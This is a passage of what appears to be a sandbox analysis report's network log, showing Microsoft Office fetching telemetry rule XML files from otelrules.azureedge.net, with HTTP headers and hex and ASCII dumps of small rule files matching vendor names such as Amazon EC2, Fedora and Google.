                                                                                                                    2024-11-30 10:35:19 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    75192.168.2.44982413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:18 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:19 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:19 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 479
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                    ETag: "0x8DC582BB7D702D0"
                                                                                                                    x-ms-request-id: 4edae9bd-001e-0017-14b4-420c3c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103519Z-174f78459685726chC1EWRsnbg00000011f0000000000h1w
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:19 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    76192.168.2.44982513.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:19 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:19 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:19 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 425
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                                                    ETag: "0x8DC582BBA25094F"
                                                                                                                    x-ms-request-id: b8a9d872-301e-003f-6bb3-42266f000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103519Z-174f7845968n2hr8hC1EWR9cag00000010wg000000006yu5
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:19 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    77192.168.2.44982613.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:19 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:19 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:19 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 475
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                    ETag: "0x8DC582BB2BE84FD"
                                                                                                                    x-ms-request-id: e4738428-701e-006f-2050-41afc4000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103519Z-174f7845968px8v7hC1EWR08ng00000011gg000000006su3
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:19 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    78192.168.2.44982813.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:20 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:20 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:20 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 448
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                    ETag: "0x8DC582BB389F49B"
                                                                                                                    x-ms-request-id: 21673337-d01e-00a1-71b2-4235b1000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103520Z-174f78459684db9fhC1EWRc7g400000001dg000000000pzg
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:20 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    79192.168.2.44982913.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:20 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:21 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:21 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 491
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                    ETag: "0x8DC582B98B88612"
                                                                                                                    x-ms-request-id: 5cf18591-601e-000d-7e91-3f2618000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103521Z-174f7845968jrjrxhC1EWRmmrs00000011cg000000006rau
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:21 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    80192.168.2.44983113.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:21 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:21 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:21 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 479
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                    ETag: "0x8DC582B989EE75B"
                                                                                                                    x-ms-request-id: 83b34a83-b01e-0053-35ab-42cdf8000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103521Z-174f7845968zgtf6hC1EWRqd8s0000000u9g000000003k9h
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:21 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    81192.168.2.44983013.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:21 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:21 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:21 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 416
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                                                    ETag: "0x8DC582BAEA4B445"
                                                                                                                    x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103521Z-174f7845968xr5c2hC1EWRd0hn0000000k30000000006rc2
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:21 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    82192.168.2.44983213.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:21 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:21 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:21 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 415
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                    ETag: "0x8DC582BA80D96A1"
                                                                                                                    x-ms-request-id: 3b640fd5-a01e-0053-6c1f-418603000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103521Z-174f7845968cpnpfhC1EWR3afc00000010y0000000004mnq
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    83192.168.2.44983313.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:22 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:23 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:22 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 471
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                    ETag: "0x8DC582B97E6FCDD"
                                                                                                                    x-ms-request-id: 99c0880e-f01e-0052-80df-419224000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103522Z-174f7845968ljs8phC1EWRe6en0000001170000000002mun
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:23 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                    84192.168.2.44983413.107.246.63443
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-11-30 10:35:23 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Accept-Encoding: gzip
                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                    2024-11-30 10:35:23 UTC470INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 30 Nov 2024 10:35:23 GMT
                                                                                                                    Content-Type: text/xml
                                                                                                                    Content-Length: 419
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                    ETag: "0x8DC582B9C710B28"
                                                                                                                    x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                    x-azure-ref: 20241130T103523Z-174f78459688l8rvhC1EWRtzr00000000dx0000000004het
                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                    X-Cache: TCP_HIT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    2024-11-30 10:35:23 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
